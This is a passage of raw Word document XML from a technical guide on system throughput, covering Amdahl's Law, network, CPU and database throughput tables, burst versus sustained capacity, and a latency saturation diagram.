        <w:t>System throughput: 10K RPS (limited by weakest link)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23108A6E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Amdahl's Law — the limit of parallelism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9B5B1A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02D6AC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Speedup = 1 / (S + P/N)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF289B5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="3599BD18" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>S = fraction of work that is serial (cannot be parallelized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F8217A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>P = fraction that is parallelizable (P = 1 - S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B292467" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>N = number of parallel processors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74667083" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="18F73D6A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>If 5% of work is serial (S=0.05):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFBCDAB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Max speedup with infinite processors: 1/0.05 = 20x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E01DF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Even with 1000 cores: speedup = 1/(0.05 + 0.95/1000) = 19.6x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666A9F4D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implication:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> If ANY part of your request path is serial (single-threaded database write, global lock, single-leader write path), that serial component determines maximum throughput regardless of how much you scale everything else.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236E3E44" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 Throughput at Each System Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575782C1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network throughput limits: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397"/>
        <w:gridCol w:w="1562"/>
        <w:gridCol w:w="2398"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="453E714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400DF7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Link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648D21" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Bandwidth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870102" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>At 1KB per request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="509FC90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8CC2E8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>1 Gbps (server NIC)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1DF966" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>125 MB/s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F5A3F6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>125,000 RPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="4D3BD3F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F07913" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>10 Gbps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618BB8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>1.25 GB/s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39E610" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>1,250,000 RPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="1B0C100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3EC67B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>25 Gbps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510ED1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>3.1 GB/s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B208E4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>3,125,000 RPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="213A97B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D007C1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>100 Gbps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C652D4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>12.5 GB/s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644F15" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>12,500,000 RPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FDB456F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CPU throughput limits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A039A1F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773C9F8E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Simple JSON parsing: ~100K ops/sec per core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC1F402" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Protobuf deserialization: ~500K ops/sec per core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABAE073" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Hash computation (SHA-256): ~500 MB/s per core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4148A9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>AES-GCM encryption (AES-NI): ~5 GB/s per core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D4DAA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>HTTP request handling (basic): ~50K–100K RPS per core (Nginx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE95D87" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database throughput limits (typical):</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501"/>
        <w:gridCol w:w="1843"/>
        <w:gridCol w:w="1843"/>
        <w:gridCol w:w="3163"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="58DD4B9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B5FE07" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Database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DF214C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reads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0D1069" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Writes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3B87FF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Bottleneck</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="403C9E4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A9560A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>PostgreSQL (single node)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569F57" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>50K–100K QPS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2BA10C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>5K–20K QPS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CE3E65" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>CPU + I/O</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="17BFCA3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8FFD3A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>MySQL (single node)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F27D33" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>50K–100K QPS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B9F35C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>5K–20K QPS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B9BE21" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>CPU + I/O</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="51623DD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BC50E1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Redis (single node)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779F7A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>100K–300K QPS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2E000F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>100K–300K QPS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C51924" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Network + single-thread</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="31EA000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EA3632" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>MongoDB (single node)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2DE9A3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>50K–100K QPS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690B60" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>10K–50K QPS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E630C5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>I/O</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="0FA0AA3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102684" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Cassandra (per node)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A2A091" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>10K–50K QPS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F6DC61" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>10K–50K QPS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7138E7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>I/O + network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="3589D37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AEF7F1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>DynamoDB (per partition)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6AAAF9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Unlimited*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2DE4CE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Unlimited*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AF7E37" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Per-partition: 3K read, 1K write units</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0382E4D0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Throughput Measurement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F90ABD8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sustained throughput vs. burst throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1D64B7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EADCC3A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Burst: Maximum RPS for a brief period (seconds). May deplete buffers/queues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C807768" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Sustained: RPS that can be maintained indefinitely without degradation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27719C50" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="4C866022" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A22E599" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Burst capacity: 100K RPS (for 10 seconds — queue absorbs excess)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CEF1FB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Sustained capacity: 50K RPS (equilibrium — processing rate matches arrival rate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2925E408" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  If traffic sustained at 70K RPS: queue grows indefinitely → system fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA9C313" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Saturation point:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> The throughput at which latency begins increasing non-linearly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AD8445" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB83922" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0974C70A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60047D82" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                  │                    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>╱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274FCAE1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                  │                   </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>╱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B26EDBC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                  │                  </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>╱</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>←</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve"> Saturation: latency explodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7B1086" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                  │                 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>╱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F35CC9C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                  │         </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>╱</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>╱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF72DAD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                  │    </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>╱</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>╱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA017BF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                  │───</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>╱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBBC251" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                  │──────────────────── Throughput →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141A85A7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                      ↑              ↑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5886248B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                  Optimal range    Saturation point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D34D046" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
